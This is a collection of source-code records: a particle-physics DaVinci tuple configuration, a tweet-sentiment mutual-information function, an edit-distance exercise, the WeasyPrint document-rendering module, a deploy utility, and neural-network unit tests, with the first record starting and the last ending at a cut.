Code=\"HLT_PASS('Stripping\"+self.lineName+\"Decision')\", Location=\"/Event/Strip/Phys/DecReports\" )\n evtPreselectors.append(strippingFilter)\n\n\n stripped_data = AutomaticData(Location = self.lineLocation)\n \n # Trigger selection\n from Configurables import TisTosParticleTagger\n _tisTosFilter = TisTosParticleTagger( self.name + \"Triggered\" )\n _tisTosFilter.TisTosSpecs = { 'L0Global%TUS' : 0,\n 'L0Global%TIS' : 0,\n }\n for trigger in trigger_list:\n for tistos in ['TIS', 'TUS']:\n _tisTosFilter.TisTosSpecs['{0}%{1}'.format(trigger, tistos)] = 0\n \n triggered_data = Selection( self.name+'TriggerSelection',\n Algorithm = _tisTosFilter,\n RequiredSelections = [ stripped_data ],\n )\n \n Candidate_selection = stripped_data #triggered_data \n \n self.sequence = SelectionSequence('Seq'+self.name,\n TopSelection = Candidate_selection,\n EventPreSelector = evtPreselectors)\n \n def makeTuple(self):\n \"\"\"\n Make tuple\n \"\"\"\n\n from Configurables import FitDecayTrees, DecayTreeTuple, TupleToolDecayTreeFitter, TupleToolDecay, TupleToolTrigger, TupleToolTISTOS, TupleToolPropertime, PropertimeFitter, TupleToolKinematic, TupleToolGeometry, TupleToolEventInfo, TupleToolPrimaries, TupleToolPid, TupleToolTrackInfo, TupleToolRecoStats, TupleToolMCTruth, LoKi__Hybrid__TupleTool, LoKi__Hybrid__EvtTupleTool\n \n\n tuple = DecayTreeTuple('Tuple'+self.name) # I can put as an argument a name if I use more than a DecayTreeTuple\n tuple.Inputs = [ self.sequence.outputLocation() ]\n tuple.Decay = self.dec\n tuple.ToolList = ['TupleToolKinematic',\n 'TupleToolEventInfo', \n 'TupleToolTrackInfo',\n 'TupleToolPid',\n 'TupleToolGeometry', \n 'TupleToolAngles', # Helicity angle\n # 'TupleToolPropertime', #proper time TAU of reco particles\n ]\n\n \n tuple.InputPrimaryVertices = '/Event/Charm/Rec/Vertex/Primary'\n\n\n # Other event infos\n tuple.addTupleTool('LoKi::Hybrid::EvtTupleTool/LoKi_Evt')\n tuple.LoKi_Evt.VOID_Variables = {\n #\"nSPDHits\" : \" CONTAINS('Raw/Spd/Digits') \" ,\n 'nTracks' : \" CONTAINS ('Charm/Rec/Track/Best') \" ,\n }\n \n # # Other variables\n # tuple.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_All')\n # tuple.LoKi_All.Variables = {\n # 'BPVIPCHI2' : 'BPVIPCHI2()',\n # 'BPVDIRA' : 'BPVDIRA',\n # 'BPVLTFITCHI2' : 'BPVLTFITCHI2()', \n # } \n \n tuple.addBranches(self.branches)\n \n tuple.phi.addTupleTool(\"LoKi::Hybrid::TupleTool/LoKi_phi\")\n tuple.phi.LoKi_phi.Variables = {\n 'DOCAMAX' : 'DOCAMAX',\n \"MassDiff_Phi\" : \"DMASS('phi(1020)')\",\n \"BPVDIRA\" : \"BPVDIRA\",\n \"IPS_Phi\" : \"MIPCHI2DV(PRIMARY)\",\n \"VFASPF_CHI2DOF\" : \"VFASPF(VCHI2/VDOF)\",\n \"VFASPF_CHI2\" : \"VFASPF(VCHI2)\",\n \"BPVIPCHI2\" : \"BPVIPCHI2()\",\n \"ADOCA\" : \"DOCA(1,2)\",\n \"ADOCACHI2\" : \"DOCACHI2(1,2)\",\n\n \"DTF_CHI2_PV\" : \"DTF_CHI2( True, 'phi(1020)' )\",\n \"DTF_NDOF_PV\" : \"DTF_NDOF( True, 'phi(1020)' )\",\n \"DTF_M_PV\" : \"DTF_FUN ( M, True, 'phi(1020)' )\",\n \"DTF_M_Ks1_PV\" : \"DTF_FUN ( CHILD(M,1), True, 'phi(1020)' )\",\n \"DTF_M_Ks2_PV\" : \"DTF_FUN ( CHILD(M,2), True, 'phi(1020)' )\",\n \n # \"DTF_CTAU_Ks1\" : \"DTF_CTAU(1, False, 'phi(1020)' )\",\n # \"DTF_CTAU_Ks2\" : \"DTF_CTAU(2, False, 'phi(1020)' )\",\n \n \n }\n \n\n def mySharedConf_Ks(branch):\n atool=branch.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_Ks')\n atool.Variables = {\n \"BPVDIRA\" : \"BPVDIRA\",\n \"VFASPF_CHI2DOF\" : \"VFASPF(VCHI2/VDOF)\",\n \"VFASPF_CHI2\" : \"VFASPF(VCHI2)\",\n \"BPVIPCHI2\" : \"BPVIPCHI2()\",\n \"BPVVD\" : \"BPVVD\",\n \"BPVVDCHI2\" : \"BPVVDCHI2\",\n \"ADOCA\" : \"DOCA(1,2)\",\n \"ADOCACHI2\" : \"DOCACHI2(1,2)\",\n 'BPVLTIME' : 'BPVLTIME()',\n }\n PropertimeTool = branch.addTupleTool(\"TupleToolPropertime/Propertime_Ks\")\n \n\n mySharedConf_Ks(tuple.Ks1)\n mySharedConf_Ks(tuple.Ks2)\n\n def mySharedConf_pi(branch):\n atool=branch.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_pi')\n atool.Variables = {\n 'TRCHI2DOF' : 'TRCHI2DOF',\n 'TRGHOSTPROB' : 'TRGHOSTPROB',\n }\n\n mySharedConf_pi(tuple.pi1)\n mySharedConf_pi(tuple.pi2) \n mySharedConf_pi(tuple.pi3)\n mySharedConf_pi(tuple.pi4) \n\n \n # Triggers: \n tuple.phi.addTupleTool('TupleToolTISTOS/TISTOS')\n tuple.phi.TISTOS.TriggerList = trigger_list\n tuple.phi.TISTOS.VerboseL0 = True\n tuple.phi.TISTOS.VerboseHlt1 = True\n tuple.phi.TISTOS.VerboseHlt2 = True\n \n \n if dataSample.isMC:\n from Configurables import MCDecayTreeTuple, MCTupleToolKinematic, TupleToolMCTruth, MCTupleToolHierarchy, MCTupleToolReconstructed, MCTupleToolAngles, TupleToolMCBackgroundInfo\n tuple.addTupleTool('TupleToolMCTruth/MCTruth')\n tuple.MCTruth.ToolList = ['MCTupleToolKinematic',\n 'MCTupleToolHierarchy',\n 'MCTupleToolReconstructed',\n 'MCTupleToolAngles',\n ]\n tuple.phi.addTupleTool( \"TupleToolMCBackgroundInfo\")\n\n \n self.sequence.sequence().Members += [tuple]\n\n # tuple.OutputLevel = DEBUG\n\n############################################################\ndef addMCTuple(name, decayDescriptor):\n '''\n Given name and decay descriptor, add MCTuple to the main DaVinci Sequence\n '''\n # MC \n mcTuple = MCDecayTreeTuple('MCTuple'+name) # I can put as an argument a name if I use more than a MCDecayTreeTuple\n mcTuple.Decay = decayDescriptor #'[phi(1020) -> ^(KS0 -> ^pi+ ^pi-) ^(KS0 -> ^pi+ ^pi-)]CC'\n mcTuple.ToolList = ['MCTupleToolKinematic',\n 'TupleToolEventInfo',\n 'MCTupleToolHierarchy',\n \"TupleToolMCBackgroundInfo\",\n ]\n DaVinci().UserAlgorithms += [mcTuple]\n \n\n\n############################################################\n## Configure DaVinci\nfrom Configurables import DaVinci\n\nif not dataSample.isMC:\n DaVinci.RootInTES = '/Event/Charm'\n DaVinci().InputType= 'MDST'\nelse:\n DaVinci().InputType= 'DST'\n \nDaVinci().Simulation = dataSample.isMC\nDaVinci().DataType = dataSample.dataType\nDaVinci().EvtMax = nEvents # 100000\nDaVinci().Lumi = not dataSample.isMC\n\nfrom Configurables import CondDB\nCondDB(LatestGlobalTagByDataType=dataSample.dataType)\nif dataSample.DDDBtag: DaVinci().DDDBtag = dataSample.DDDBtag \nif dataSample.CondDBtag: DaVinci().CondDBtag = dataSample.CondDBtag \n\n#DaVinci().EventPreFilters += [strippingFilter]\n#if dataSample.isMC: DaVinci().UserAlgorithms += [mcTuple]\n\n\n##Debug Background#\n# from Configurables import PrintDecayTree\n# printTree = PrintDecayTree(Inputs = [ location ])\n# DaVinci().appendToMainSequence( [ printTree ] )\n# from Configurables import PrintMCTree, PrintMCDecayTreeTool\n# mctree = PrintMCTree(\"PrintDs\")\n# mctree.addTool(PrintMCDecayTreeTool, name = \"PrintMC\")\n# mctree.PrintMC.Information = \"Name M P Px Py Pz Pt\"\n# mctree.ParticleNames = [ \"D_s+\", \"D_s-\"]\n# mctree.Depth = 3\n# Xib_sequence.sequence().Members += [ mctree ] \n##################\n\n\nPhi2KsKs_line = strippingLine(name = 'Ds_Phi2KsKs',\n lineName = 'PhiToKSKS_PhiToKsKsLine',\n dec = '[D_s+ -> ^(phi(1020) -> ^(KS0 -> ^pi+ ^pi-) ^(KS0 -> ^pi+ ^pi-)) ^pi+]CC',\n branches = {'Ds' : '[D_s+ -> (phi(1020) -> (KS0 -> pi+ pi-) (KS0 -> pi+ pi-)) pi+]CC',\n 'phi' : '[D_s+ -> ^(phi(1020) -> (KS0 -> pi+ pi-) (KS0 -> pi+ pi-)) pi+]CC',\n 'Ks1' : '[D_s+ -> (phi(1020) -> ^(KS0 -> pi+ pi-) (KS0 -> pi+ pi-)) pi+]CC',\n 'Ks2' : '[D_s+ -> (phi(1020) -> (KS0 -> pi+ pi-) ^(KS0 -> pi+ pi-)) pi+]CC',\n 'pi1' : '[D_s+ -> (phi(1020) -> (KS0 -> ^pi+ pi-) (KS0 -> pi+ pi-)) pi+]CC',\n 'pi2' : '[D_s+ -> (phi(1020) -> (KS0 -> pi+ ^pi-) (KS0 -> pi+ pi-)) pi+]CC',\n 'pi3' : '[D_s+ -> (phi(1020) -> (KS0 -> pi+ pi-) (KS0 -> ^pi+ pi-)) pi+]CC',\n 'pi4' : '[D_s+ -> (phi(1020) -> (KS0 -> pi+ pi-) (KS0 -> pi+ ^pi-)) pi+]CC',\n 'pis' : '[D_s+ -> (phi(1020) -> (KS0 -> pi+ pi-) (KS0 -> pi+ pi-)) ^pi+]CC',\n })\n\n\nif dataSample.isMC: # Kill banks with old stripping\n from Configurables import EventNodeKiller\n eventNodeKiller = EventNodeKiller('Stripkiller')\n eventNodeKiller.Nodes = [ '/Event/AllStreams', '/Event/Strip' ]\n\n # Rerun the stripping selection if MC\n\n\n from StrippingConf.Configuration import StrippingConf, StrippingStream\n from StrippingSettings.Utils import strippingConfiguration\n from StrippingArchive.Utils import buildStreams\n from StrippingArchive import strippingArchive\n \n # Standard stripping21 \n stripping='stripping21'\n config = strippingConfiguration(stripping)\n archive = strippingArchive(stripping)\n streams = buildStreams(stripping=config, archive=archive)\n \n # Select my line \n MyStream = StrippingStream(\"MyStream\")\n MyLines = [ 'Stripping'+line.lineName for line in [Phi2KsKs_line] ]\n \n for stream in streams: \n for line in stream.lines:\n if line.name() in MyLines:\n MyStream.appendLines( [ line ] )\n\n # Configure Stripping\n from Configurables import ProcStatusCheck\n filterBadEvents = ProcStatusCheck()\n \n sc = StrippingConf( Streams = [ MyStream ],\n MaxCandidates = 2000,\n AcceptBadEvents = False,\n BadEventSelection = filterBadEvents )\n\n DaVinci().appendToMainSequence( [ eventNodeKiller, sc.sequence() ] )\n\n # MC Tuples\n addMCTuple('phi2KsKs', '[phi(1020) -> ^(KS0 -> ^pi+ ^pi-) ^(KS0 -> ^pi+ ^pi-)]CC')\n addMCTuple('phi2KsKl', '[phi(1020) -> ^(KS0 -> ^pi+ ^pi-) ^(KL0 -> ^pi+ ^pi-)]CC')\n addMCTuple('Ds_phi2KsKl', '[D_s+ -> ^(phi(1020) -> ^(KS0 -> ^pi+ ^pi-) ^(KS0 -> ^pi+ ^pi-)) ^pi+]CC')\n if 'minbias' in dataSample.name:\n addMCTuple('phi2KK', '[phi(1020) -> ^K- ^K-]CC')\n # addMCTuple('KsKs', '[(KS0 -> ^pi+ ^pi-)cc && (KS0 -> ^pi+ ^pi-)cc]')\n addMCTuple('Ks', '[KS0 -> ^pi+ ^pi-]CC')\n\n from Configurables import PrintMCTree, PrintMCDecayTreeTool\n mctree = PrintMCTree(\"PrintTruePhi\")\n mctree.addTool(PrintMCDecayTreeTool, name = \"PrintMC\")\n mctree.PrintMC.Information = \"Name\"\n mctree.ParticleNames = [ \"phi(1020)\", 'KS0' ]\n mctree.Depth = 2\n \n \n###########################################################\n\nfor strLine in [Phi2KsKs_line]:\n strLine.select()\n strLine.makeTuple()\n\n DaVinci().appendToMainSequence( [ strLine.sequence.sequence() ])\n\n\nDaVinci().HistogramFile = \"DVHistos.root\"\nDaVinci().TupleFile = dataSample.outputNtupleName\n\n# ###################################################\n# #\n# # Configuration of uDSTWriter\n# #\n\n# from DSTWriters.Configuration import SelDSTWriter, stripMicroDSTStreamConf, stripMicroDSTElements\n\n# SelDSTWriterConf = {'default' : stripMicroDSTStreamConf(pack=False)}\n\n# SelDSTWriterElements = {'default' : stripMicroDSTElements(pack=False)}\n\n# udstWriter = SelDSTWriter('MyMicroDSTWriter',\n# StreamConf = SelDSTWriterConf,\n# MicroDSTElements = SelDSTWriterElements,\n# OutputFileSuffix = dataSample.outputNtupleName.split('.')[0],\n# SelectionSequences = sc.activeStreams(),\n# )\n\n# DaVinci().appendToMainSequence( [ udstWriter.sequence() ] )\n\n# ###################################################\n\nfrom Configurables import Gaudi__IODataManager as IODataManager\nIODataManager( \"IODataManager\" ).UseGFAL = False\n\n\n","sub_path":"Rootuplizer_Ds/Rootuplizer.py","file_name":"Rootuplizer.py","file_ext":"py","file_size_in_byte":14961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"49521985","text":"\"\"\"\n--------------------------------------\nauthor: Uli Steinbach\nFeatureextraktion: mutual information \nProjekt-HA: sentiment analysis of tweets\n--------------------------------------\n\"\"\"\n\nimport math \n\n# Funktion mutualInformation wird aufgerufen mit einem token und den Statistiken zu den Vorkommenshäufigkeiten im negativen und positiven Trainingsdaten\n# all diese Angaben werden aus den beiden Objekten neg und pos ausgelesen\ndef mutualInformation(word, neg, pos):\n\tnegCorp = []\n\tposCorp = []\n\t# total Number of documents in pos and neg trainingset\n\tN = neg.corpusLength + pos.corpusLength\n\tprint(N)\n\t\n\t# tokenLexicon is a dictionary containing each type in the respective trainingset as a key and a list of #totalOccurences of token and #tweetsContainingType\n\t# e.g. { ..., 'look' : [23, 21] , ...} --> token 'look' occurs 23 times in negative trainingsset and type 'look' occurs in 21 different tweets in negative trainingsset\n\tfor key, val in neg.tokenLexicon.items():\n\t\tif(key == word):\n\t\t\tnegCorp = val\n\tfor key, val in pos.tokenLexicon.items():\n\t\tif(key == word):\n\t\t\tposCorp = val\t\t\n\ttry:\n\t\t# number of occurences of token in positive corpus\n\t\tN11 = posCorp[1] + 1\n\texcept IndexError:\n\t\t# if not found default smoothing value of [1, 1] to avoid zero values\n\t\tN11 = 1\n\t\tposCorp = [1,1]\n\t\t\n\ttry:\n\t\t# number of occurences of token in negative corpus\n\t\tN10 = negCorp[1] + 1 \n\texcept IndexError:\n\t\t# if not found default smoothing value of [1, 1] to avoid zero values\n\t\tN10 = 1\n\t\tnegCorp = [1,1]\n\t# number of tokens != token in negative corpus \n\tN00 = N - ((pos.corpusLength) - N11) - N11 - N10\n\t# number of tokens != token in positive corpus\n\tN01 = N - ((neg.corpusLength) - N10) - N10 - N11\n\t# number of tokens in positive corpus\n\tN_1 = N01 + N11\n\t# combined number of occurences of token in negative corpus and positive corpus\n\tN1_ = N10 + N11\n\t# combined number of occurences of tokens != token in negative corpus and positive corpus\n\tN0_ = N01 + N00\n\t# number of tokens in negative corpus\n\tN_0 = N10 + N00\n\n\t# calculate probabilities according to formula for mutual information, see: http://nlp.stanford.edu/IR-book/html/htmledition/mutual-information-1.html#mifeatsel2\n\tp1 = (N11/N) * math.log((N*N11)/(N1_*N_1), 2)\n\tp2 = (N01/N) * math.log((N*N01)/(N0_*N_1), 2)\n\tp3 = (N10/N) * math.log((N*N10)/(N1_*N_0), 2)\n\tp4 = (N00/N) * math.log((N*N00)/(N0_*N_0), 2)\n\n\tmI = p1 + p2 + p3 + p4 \n\t# label the results with the majority class count \n\tif(negCorp[0] > posCorp[0]):\n\t\treturn(mI, \"neg\")\n\tif(negCorp[0] < posCorp[0]):\n\t\treturn(mI, \"pos\")\n\telse:\n\t\t# all words appearing equally distributed among pos and neg class\n\t\treturn(mI, \"neutral\")\n","sub_path":"GetData/mI.py","file_name":"mI.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"571411890","text":"\"\"\"\nGiven two strings S and T, determine if they are both one edit distance apart.\n\nExample\nExample 1:\n\nInput: s = \"aDb\", t = \"adb\"\nOutput: true\nExample 2:\n\nInput: s = \"ab\", t = \"ab\"\nOutput: false\nExplanation:\ns=t ,so they aren't one edit distance apart\n\"\"\"\n\n\ndef isOneEditDistance(s, t):\n n, m = len(s), len(t)\n if abs(n - m) > 1:\n return False\n\n i = j = diff = 0\n while i < n and j < m:\n if s[i] != t[j]:\n if diff == 1:\n return False\n\n if n > m:\n i += 1\n elif n < m:\n j += 1\n else:\n i, j = i + 1, j + 1\n diff += 1\n else:\n i, j = i + 1, j + 1\n\n diff += i < n or j < m\n\n return diff == 1\n\n\ndef __test(s, t, expected):\n actual = isOneEditDistance(s, t)\n\n assert actual == expected, 'Wrong answer'\n print('Accepted')\n\n\nif __name__ == '__main__':\n s, t = \"aDb\", \"adb\"\n __test(s, t, True)\n\n s, t = \"a\", \"adb\"\n __test(s, t, False)\n\n s, t = \"aDbb\", \"adb\"\n __test(s, t, False)\n\n s, t = \"Dab\", \"adb\"\n __test(s, t, False)\n\n s, t = \"adB\", \"adb\"\n __test(s, t, True)","sub_path":"Problems/companies/Facebook/edit_distance.py","file_name":"edit_distance.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"480530763","text":"# coding: utf8\n\"\"\"\n weasyprint.document\n -------------------\n\n Entry point to the rendering process.\n\n :copyright: Copyright 2011-2012 Simon Sapin and contributors, see AUTHORS.\n :license: BSD, see LICENSE for details.\n\n\"\"\"\n\nfrom __future__ import division, unicode_literals\n\nimport io\nimport sys\nimport math\nimport shutil\n\nimport cairo\n\nfrom .css import get_all_computed_styles\nfrom .formatting_structure.build import build_formatting_structure\nfrom .urls import FILESYSTEM_ENCODING\nfrom . import layout\nfrom . import draw\nfrom . import images\nfrom . import pdf\n\n\nclass Document(object):\n \"\"\"Abstract output document.\"\"\"\n def __init__(self, element_tree, enable_hinting, url_fetcher,\n user_stylesheets, user_agent_stylesheets):\n self.element_tree = element_tree #: lxml HtmlElement object\n self.enable_hinting = enable_hinting\n self.url_fetcher = url_fetcher\n self.user_stylesheets = user_stylesheets\n self.user_agent_stylesheets = user_agent_stylesheets\n self._image_cache = {}\n self._computed_styles = None\n self._formatting_structure = None\n self._pages = None\n\n # This is mostly useful to make pseudo_type optional.\n def style_for(self, element, pseudo_type=None):\n \"\"\"\n Convenience method to get the computed styles for an element.\n \"\"\"\n return self.computed_styles.get((element, pseudo_type))\n\n @property\n def computed_styles(self):\n \"\"\"\n dict of (element, pseudo_element_type) -> StyleDict\n StyleDict: a dict of property_name -> PropertyValue,\n also with attribute access\n \"\"\"\n if self._computed_styles is None:\n self._computed_styles = get_all_computed_styles(\n self.element_tree, url_fetcher=self.url_fetcher,\n user_stylesheets=self.user_stylesheets,\n ua_stylesheets=self.user_agent_stylesheets,\n medium='print')\n return self._computed_styles\n\n @property\n def formatting_structure(self):\n \"\"\"\n The root of the formatting structure tree, ie. the Box\n for the root element.\n \"\"\"\n if self._formatting_structure is None:\n self._formatting_structure = build_formatting_structure(\n self.element_tree, self.style_for, self.get_image_from_uri)\n return self._formatting_structure\n\n @property\n def pages(self):\n \"\"\"\n List of layed-out pages with an absolute size and postition\n for every box.\n \"\"\"\n if self._pages is None:\n context = layout.LayoutContext(\n self.enable_hinting, self.style_for, self.get_image_from_uri)\n self._pages = list(layout.layout_document(\n context, self.formatting_structure))\n return self._pages\n\n def get_image_from_uri(self, uri, type_=None):\n return images.get_image_from_uri(\n self._image_cache, self.url_fetcher, uri, type_)\n\n def get_png_surfaces(self, resolution=None):\n \"\"\"Yield (width, height, image_surface) tuples, one for each page.\"\"\"\n px_resolution = (resolution or 96) / 96\n for page in self.pages:\n width = int(math.ceil(page.margin_width() * px_resolution))\n height = int(math.ceil(page.margin_height() * px_resolution))\n surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, width, height)\n context = draw.make_cairo_context(\n surface, self.enable_hinting, self.get_image_from_uri)\n context.scale(px_resolution, px_resolution)\n draw.draw_page(page, context)\n yield width, height, surface\n\n def get_png_pages(self, resolution=None):\n \"\"\"Yield (width, height, png_bytes) tuples, one for each page.\"\"\"\n for width, height, surface in self.get_png_surfaces(resolution):\n file_obj = io.BytesIO()\n surface.write_to_png(file_obj)\n yield width, height, file_obj.getvalue()\n\n def write_png(self, target=None, resolution=None):\n \"\"\"Write a single PNG image.\"\"\"\n surfaces = list(self.get_png_surfaces(resolution))\n if len(surfaces) == 1:\n _, _, surface = surfaces[0]\n else:\n total_height = sum(height for _, height, _ in surfaces)\n max_width = max(width for width, _, _ in surfaces)\n surface = cairo.ImageSurface(\n cairo.FORMAT_ARGB32, max_width, total_height)\n context = cairo.Context(surface)\n pos_y = 0\n for width, height, page_surface in surfaces:\n pos_x = (max_width - width) // 2\n context.set_source_surface(page_surface, pos_x, pos_y)\n context.paint()\n pos_y += height\n\n if target is None:\n target = io.BytesIO()\n surface.write_to_png(target)\n return target.getvalue()\n else:\n if sys.version_info[0] < 3 and isinstance(target, unicode):\n # py2cairo 1.8 does not support unicode filenames.\n target = target.encode(FILESYSTEM_ENCODING)\n surface.write_to_png(target)\n\n def write_pdf(self, target=None):\n \"\"\"Write a single PNG image.\"\"\"\n # Use an in-memory buffer. We will need to seek for metadata\n # TODO: avoid this if target can seek? Benchmark first.\n file_obj = io.BytesIO()\n # We’ll change the surface size for each page\n surface = cairo.PDFSurface(file_obj, 1, 1)\n px_to_pt = pdf.PX_TO_PT\n for page in self.pages:\n surface.set_size(page.margin_width() * px_to_pt,\n page.margin_height() * px_to_pt)\n context = draw.make_cairo_context(\n surface, self.enable_hinting, self.get_image_from_uri)\n context.scale(px_to_pt, px_to_pt)\n draw.draw_page(page, context)\n surface.show_page()\n surface.finish()\n\n pdf.write_pdf_metadata(self.pages, file_obj)\n\n if target is None:\n return file_obj.getvalue()\n else:\n file_obj.seek(0)\n if hasattr(target, 'write'):\n shutil.copyfileobj(file_obj, target)\n else:\n with open(target, 'wb') as fd:\n shutil.copyfileobj(file_obj, fd)\n","sub_path":"weasyprint/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":6390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"464006701","text":"'''Utility functions for the deploy module.'''\nimport os\nfrom datetime import datetime\nfrom pathlib import Path\nfrom joblib import load\n\n\ndef progress_bar(current, total, bar_length = 20):\n '''Visual progress bar in console.'''\n percent = float(current) * 100 / total\n arrow = '-' * int(percent/100 * bar_length - 1) + '>'\n spaces = ' ' * (bar_length - len(arrow))\n print('Progress: [%s%s] %d %%' % (arrow, spaces, percent), end='\\r')\n\ndef ensure_path_exists(path):\n '''Creates directory if not exists.'''\n Path(path).mkdir(parents=True, exist_ok=True)\n\ndef remove_file(path):\n '''Remove directory if exists.'''\n Path(path).unlink(missing_ok=True)\n\n# pylint: disable=W0703\ndef load_best_clf():\n '''Loads the best original model.'''\n file_to_load, latest_date = 'model.joblib', datetime.strptime('01-01-1970', \"%m-%d-%Y\")\n for filename in os.listdir('output'):\n if filename.endswith(\".joblib\"):\n try:\n if latest_date < datetime.strptime(\n filename.split('_')[1].split('.')[0], \"%m-%d-%Y\"):\n file_to_load = filename\n latest_date = datetime.strptime(\n filename.split('_')[1].split('.')[0], \"%m-%d-%Y\")\n classifier_name = filename.split('_')[0]\n except Exception:\n continue\n\n return load('output/' + file_to_load), classifier_name\n","sub_path":"deploy_model/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"92515936","text":"\"\"\"Unit tests for the NeuralNetwork class.\"\"\"\n\nfrom itertools import product\n\nimport numpy as np\nimport pytest\nfrom scipy.special import expit\n\nimport deeplib as dl\n\n\ndef test_bad_args():\n \"\"\"Check for errors raised when arguments are invalid.\"\"\"\n with pytest.raises(TypeError):\n dl.model.NeuralNetwork(loss=\"not a loss function\",\n optimizer=dl.optimizer.GradientDescent())\n with pytest.raises(TypeError):\n dl.model.NeuralNetwork(loss=dl.loss.AbsoluteError(),\n optimizer=\"not an optimizer\")\n\n model = dl.model.NeuralNetwork(loss=dl.loss.SquaredError(),\n optimizer=dl.optimizer.GradientDescent())\n with pytest.raises(TypeError):\n model.add(\"Not a layer\")\n\n\ndef test_ols():\n \"\"\"Test a simple OLS model built as a neural network.\"\"\"\n # The true model\n n = 10\n slope = 2\n intercept = 1\n x = np.arange(n)\n y_true = intercept + slope * x\n\n for standardize in (True, False):\n # Build an ordinary least squares model\n model = dl.model.NeuralNetwork(\n loss=dl.loss.SquaredError(),\n optimizer=dl.optimizer.GradientDescent(learning_rate=0.01,\n momentum=0.9),\n standardize=standardize)\n\n with pytest.raises(RuntimeError):\n # This model has no layers yet so it can't be trained\n model.train(x, y_true)\n\n model.add(dl.layer.Affine(n_outputs=1))\n\n with pytest.raises(RuntimeError):\n # This model isn't trained yet\n model.check_trained()\n\n for weighted, bootstrap in product((True, False), (True, False)):\n model.train(x, y_true, n_epochs=400, batch_size=5,\n clipping_threshold=3, weighted=weighted,\n bootstrap=bootstrap, random_state=0)\n model.check_trained()\n\n y_pred = model.predict(x).reshape(-1)\n\n np.testing.assert_almost_equal(y_true, y_pred)\n\n\ndef test_ols_convoluted():\n \"\"\"Test a convoluted multi-layer model that's still just OLS.\"\"\"\n # The true model\n n = 20\n slope = 2\n intercept = 1\n x = np.random.RandomState(0).normal(size=n)\n y_true = intercept + slope * x\n\n for standardize in (True, False):\n # Build a OLS model\n model = dl.model.NeuralNetwork(\n loss=dl.loss.SquaredError(),\n optimizer=dl.optimizer.Nesterov(learning_rate=0.01, momentum=0.9),\n standardize=standardize)\n\n with pytest.raises(RuntimeError):\n # This model has no layers yet so it can't be trained\n model.train(x, y_true)\n\n # Add a few do-nothing layers\n model.add(dl.layer.Identity())\n model.add(dl.layer.Identity())\n\n with pytest.raises(RuntimeError):\n # The model doesn't have any trainable layers yet\n model.train(x, y_true)\n\n # Add two affine layers (of course the net effect is the same as one\n # affine layer since the composition of two affine transformations is\n # still affine)\n model.add(dl.layer.Affine(n_outputs=3))\n model.add(dl.layer.Affine(n_outputs=1))\n\n with pytest.raises(RuntimeError):\n # This model isn't trained yet\n model.check_trained()\n\n for weighted, bootstrap in product((True, False), (True, False)):\n model.train(x, y_true, n_epochs=100, batch_size=5,\n clipping_threshold=3, weighted=weighted,\n bootstrap=bootstrap, random_state=0)\n model.check_trained()\n\n y_pred = model.predict(x).reshape(-1)\n\n np.testing.assert_almost_equal(y_true, y_pred)\n\n\ndef test_easy_ols():\n \"\"\"Example from http://onlinestatbook.com/2/regression/intro.html\"\"\"\n x = [1, 2, 3, 4, 5]\n y = [1, 2, 1.3, 3.75, 2.25]\n\n model = dl.model.NeuralNetwork(\n loss=dl.loss.SquaredError(),\n optimizer=dl.optimizer.GradientDescent(learning_rate=0.1, momentum=0.9),\n standardize=False)\n\n layer = dl.layer.Affine(n_outputs=1)\n model.add(layer)\n\n model.train(x, y, n_epochs=1000, batch_size=5, weighted=False,\n bootstrap=False, random_state=1)\n\n np.testing.assert_almost_equal(layer.bias.item(), 0.785)\n np.testing.assert_almost_equal(layer.weights.item(), 0.425)\n\n\ndef test_easy_linear_regression():\n \"\"\"Simple multidimensional linear regression as a neural network.\"\"\"\n rs = np.random.RandomState(0)\n\n # True model\n n = 100\n p = 10\n coef = np.arange(p)\n intercept = -3\n\n x = rs.normal(size=(n, p))\n noise = rs.normal(scale=0.05, size=n)\n y = intercept + x.dot(coef) + noise\n\n # Linear regression model\n model = dl.model.NeuralNetwork(\n loss=dl.loss.SquaredError(),\n optimizer=dl.optimizer.GradientDescent(learning_rate=0.02,\n momentum=0.5),\n standardize=False)\n\n layer = dl.layer.Affine(n_outputs=1)\n model.add(layer)\n\n for bootstrap in (True, False):\n model.train(x, y, n_epochs=500, batch_size=10, weighted=False,\n bootstrap=bootstrap, random_state=rs)\n\n np.testing.assert_almost_equal(layer.bias.item(), intercept, decimal=2)\n np.testing.assert_almost_equal(layer.weights[:, 0], coef, decimal=2)\n\n\ndef test_seber_lee_linear_regression():\n \"\"\"Example from Exercises 3a, #3 in Seber & Lee (2003)\n\n References\n ----------\n .. [1] George A. F. Seber and Alan J. Lee. Linear Regression Analysis,\n Second Edition. Wiley Series in Probability and Statistics.\n Wiley-Interscience, Hoboken, NJ (2003), pp. xvi+557.\n `DOI `__.\n \"\"\"\n x = [[1, 0], [2, -1], [1, 2]]\n rs = np.random.RandomState(0)\n\n repeats = 10\n for _ in range(repeats):\n y = rs.normal(scale=20, size=len(x))\n y1, y2, y3 = y\n\n model = dl.model.NeuralNetwork(\n loss=dl.loss.SquaredError(),\n optimizer=dl.optimizer.Adam(learning_rate=5),\n standardize=False)\n\n layer = dl.layer.Linear(n_outputs=1)\n model.add(layer)\n\n model.train(x, y, n_epochs=200, batch_size=3, weighted=False,\n bootstrap=False, random_state=0)\n theta, phi = layer.weights[:, 0]\n\n np.testing.assert_almost_equal(theta, (y1 + 2 * y2 + y3) / 6,\n decimal=3)\n np.testing.assert_almost_equal(phi, (2 * y3 - y2) / 5, decimal=3)\n\n\ndef test_learn_xor():\n \"\"\"Learning XOR example from Section 6.1 of [1]_.\n\n References\n ----------\n .. [1] Ian Goodfellow, Yoshua Bengio, and Aaron Courville. Deep Learning.\n MIT Press (2016). `URL `__.\n \"\"\"\n optimizers = [\n dl.optimizer.GradientDescent(learning_rate=0.5, 